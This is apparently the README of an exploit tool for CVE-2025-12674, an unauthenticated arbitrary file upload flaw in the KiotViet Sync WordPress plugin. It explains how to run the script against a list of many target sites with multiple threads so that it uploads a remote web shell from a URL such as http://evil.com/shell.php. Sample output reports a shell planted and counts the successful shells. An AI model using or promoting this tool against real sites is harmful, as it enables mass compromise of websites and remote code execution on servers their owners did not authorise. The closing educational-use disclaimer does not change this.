KiotViet Sync <= 1.8.5 - 未认证任意文件上传
WordPress 的 KiotViet Sync 插件(版本 1.8.5 及以下)存在任意文件上传漏洞,原因在于 create_media() 函数缺少文件类型验证。
该漏洞允许 未认证的攻击者 向服务器上传任意文件,可能导致 远程代码执行。
克隆此仓库,或下载脚本。
准备目标:
每行一个目标,存放在名为 list.txt 的文件中。
example.com
site2.com
http://site3.com
运行漏洞利用脚本:
脚本名称:
CVE-2025-12674.py
python3 CVE-2025-12674.py
根据提示输入选项:
Enter targets file name (default: list.txt): list.txt
Enter number of threads (default: 10):
Enter REMOTE SHELL URL (direct link): http://evil.com/shell.php
╭──────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────╮
│ Loaded 1 targets. Threads: 10. │
╰──────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────╯
╭──────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────╮
│ http://nxk.ddev.site │
│ Trying KiotViet exploit... │
╰──────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────╯
╔══════════════════════════════════════════════════════════════════════════════════════════════════════════════════════════╗
║ ✔ Shell uploaded! ║
║ Check here: ║
║ http://nxk.ddev.site/wp-content/uploads/2026/01/ ║
║ ║
╚══════════════════════════════════════════════════════════════════════════════════════════════════════════════════════════╝
Summary
Metric Value
───────────────────────────
Total attempts 1
Successful shells 1
Failed attempts 0
shells.txt。本脚本仅供教育和授权的安全测试使用。
未经授权,对您不拥有或未获得明确测试许可的系统进行使用是非法且不道德的。
作者不对滥用或造成的任何损害承担责任。
Nxploited (Khaled Alenazi)